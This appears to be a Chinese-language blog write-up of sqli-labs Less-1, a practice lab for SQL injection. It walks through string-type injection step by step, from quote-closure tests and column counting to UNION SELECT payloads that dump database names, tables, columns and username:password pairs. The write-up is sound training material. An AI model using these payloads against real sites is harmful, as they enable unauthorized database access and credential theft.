美文网首页WEB渗透与网络安全信息安全CTF-Web安全
sqli-labs Less-1

sqli-labs Less-1

作者: LonelySong | 来源:发表于2020-03-30 17:30 被阅读0次

MySQL中的information_schema数据库表说明:
SCHEMATA表:提供了当前MySQL实例中所有数据库的信息。是show databases的结果取之此表。
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

1.字符型SQL注入的关键是单引号的闭合

2.MySQL数据库对于单引号的规则如下:

单引号必须成对出现,否则数据库就会报错。
如果两个单引号之间内容为空,数据库自动忽略。

3.如何判断是否是字符型注入

id=xx'
id=xx''

如果第一个页面出现错误则,而使用第二个的时候页面正常,该url可以进行字符型注入。


第一次测试
第二次测试

4.猜字段数

方法一:

id=1' union select 1,2,3,4 --+

这是可以看到页面显示不正常,我们减少union select后面跟的参数

id=1' union select 1,2,3 --+

此时页面显示正常,我们可以得知共有3个字段

方法二:

index.php?id=1' order by 3--+

index.php?id=1' order by 4--+

4.使用联合查询查看页面是否有显示位

index.php?id=-1' union select 1,2,3--+

这里需要注意的是id的值需要是一个数据库中不存在的值,这样显示位才会显示我们后面联合查询中的数据。


5.爆出数据库版本和当前数据库名

index.php?id=-1' union select 1,version(),database()--+

6.爆出所有数据库

index.php?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+

7.爆出当前数据库所有表

index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
成功爆出security库中所有表

8.查询当前数据库users表所有字段

index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
成功爆出users表中所有字段

9.查询数据

index.php?id=-1' union select 1,group_concat(username,":",password),3 from users --+
image.png

相关文章

  • sqli-labs write up

    sqli-labs [TOC] Less-1: error based string 判断参数ID类型?id=1 ...

  • sqli-labs Less-1

    1.首先来到less-1 url后面输入?id=1 大家可能此时与我不同的是 这是为了方便我们自己看到底执行的sq...

  • sqli-labs Less-1

    大一开学面试校科协计算机部时,舒畅学姐给我出的题就是sql注入,一年多以后,我终于做出我的第一个sql注入题。先分...

  • sqli-labs (less-1)

    Less1 核心代码 在用户表中查询一条用户信息,在页面中显示这条信息的用户名密码 具体后台mysql中操作的结果...

  • sqli-labs Less-1

    MySQL中的information_schema数据库表说明:SCHEMATA表:提供了当前MySQL实例中所有...

  • sqli-labs修炼【1-10】

    摘要:本篇是关于sqli-labs第1到第10关的闯关记录 Less-1 单引号闭合,有错误提示,有查询返回点 根...

  • 搭建sqli-labs注入平台

    搭建SQL注入平台 docker搭建sqli-labs 运行sqli-labs 初始化数据库 访问sqli-labs

  • [sqli-labs]Less-1(明注 , Bool盲注 ,

    打开主页进入第一关 : 提示传入id这个参数 发现这个页面会根据传入的ID查询到对应的用户这里我们可以通过查看数据...

  • SQLi-Labs 练习总结 Page-1 Less-1

    SQLi-LABS 练习总结 Page-1 基础练习 写在前面:SQL注入是一个需要不断尝试的过程,其中可能出现很...

  • sqli-labs靶场Less-62题解(少于130次)

    sqli-labs[https://github.com/Audi-1/sqli-labs]靶场Less-62题目...

网友评论

    本文标题:sqli-labs Less-1

    本文链接:https://www.haomeiwen.com/subject/phpvuhtx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    WEB渗透与网络安全

    信息安全

    CTF-Web安全

    关于我们|服务条款|联系我们|sqli-labs Less-1|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!